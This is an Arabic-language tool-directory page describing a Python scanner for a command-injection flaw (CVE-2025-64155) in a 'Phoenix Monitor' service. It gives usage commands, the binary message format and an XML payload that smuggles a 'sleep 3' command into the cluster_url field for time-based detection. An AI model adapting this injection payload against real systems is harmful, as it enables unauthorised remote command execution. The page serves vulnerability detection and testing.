Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-64155-hunter — CVE-2025-64155-hunter | Kitploit
أدوات/GitHubGitHub/purehate/cve-2025-64155-hunter
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubpurehate/cve-2025-64155-hunter

CVE-2025-64155-hunter

CVE-2025-64155-hunter

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ماسح CVE-2025-64155

ماسح بايثون لاكتشاف ثغرة حقن الأوامر (CVE-2025-64155) في خدمة Phoenix Monitor.

الوصف

CVE-2025-64155 هي ثغرة حقن أوامر في خدمة Phoenix Monitor تسمح بتنفيذ الأوامر عن بُعد عبر المعامل cluster_url في الأمر handleStorageRequest (معرف الأمر: 1075724911).

تحدث الثغرة عندما يتم تمرير إدخال يتحكم به المستخدم في حقل cluster_url إلى أمر شل دون تنقية مناسبة، مما يسمح بحقن الأوامر عبر أحرف شل الوصفية.

يعتمد هذا الماسح على بحث الاستغلال بواسطة Horizon3AI.

الميزات

  • الكشف المستند إلى الزمن: يستخدم طريقة كشف آمنة غير مدمرة تعتمد على الزمن
  • دعم SSL/TLS: يدير اتصالات SSL مع تجاوز التحقق من الشهادة
  • وضع الإسهاب: مخرجات مفصلة لتصحيح الأخطاء
  • فحص الخدمة: خيار للتحقق من إمكانية الوصول إلى الخدمة دون اختبار الثغرة

المتطلبات

  • Python 3.6+
  • مكتبة قياسية فقط (لا تبعيات خارجية)

الاستخدام

الفحص الأساسي

root@kitploit:~
python3 scanner.py -t <target_ip>

الخيارات المتقدمة

root@kitploit:~
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900

# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v

# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15

# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only

وسائط سطر الأوامر

  • -t, --target: عنوان IP الهدف أو اسم المضيف (مطلوب)
  • -p, --port: منفذ خدمة Phoenix Monitor (الافتراضي: 7900)
  • --timeout: مهلة الاتصال بالثواني (الافتراضي: 10)
  • -v, --verbose: تفعيل الإخراج المُفصَّل
  • --check-only: فقط تحقق من إمكانية الوصول إلى الخدمة

كيف يعمل

يستخدم الماسح طريقة الكشف المستند إلى الزمن:

  1. يتصل بخدمة Phoenix Monitor عبر SSL/TLS
  2. يرسل أمر handleStorageRequest بحمولة خبيثة تحتوي على sleep 3 في حقل cluster_url
  3. يقيس وقت الاستجابة
  4. إذا تأخرت الاستجابة بحوالي 3 ثوانٍ، فالهدف غالبًا ضعيف (تم تنفيذ الأمر)

هذه الطريقة آمنة وغير مدمرة - لا تنفذ أوامر ضارة، فقط أمر sleep غير ضار لأغراض الكشف.

مثال على الإخراج

هدف ضعيف

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds

============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)

هدف غير ضعيف

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds

============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable

التفاصيل التقنية

تنسيق الرسالة

يرسل الماسح رسالة ثنائية بالهيكل التالي:

root@kitploit:~
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload

هيكل الحمولة

تحتوي الحمولة XML على حقن أوامر في حقل cluster_url:

root@kitploit:~
<TEST_STORAGE type="elastic">
    <cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
    ...
</TEST_STORAGE>

إخلاء مسؤولية

هذه الأداة مخصصة لأغراض اختبار الأمان والبحث المصرح به فقط. استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.

الترخيص

رخصة MIT - انظر ملف LICENSE للتفاصيل.

تنزيل الأداة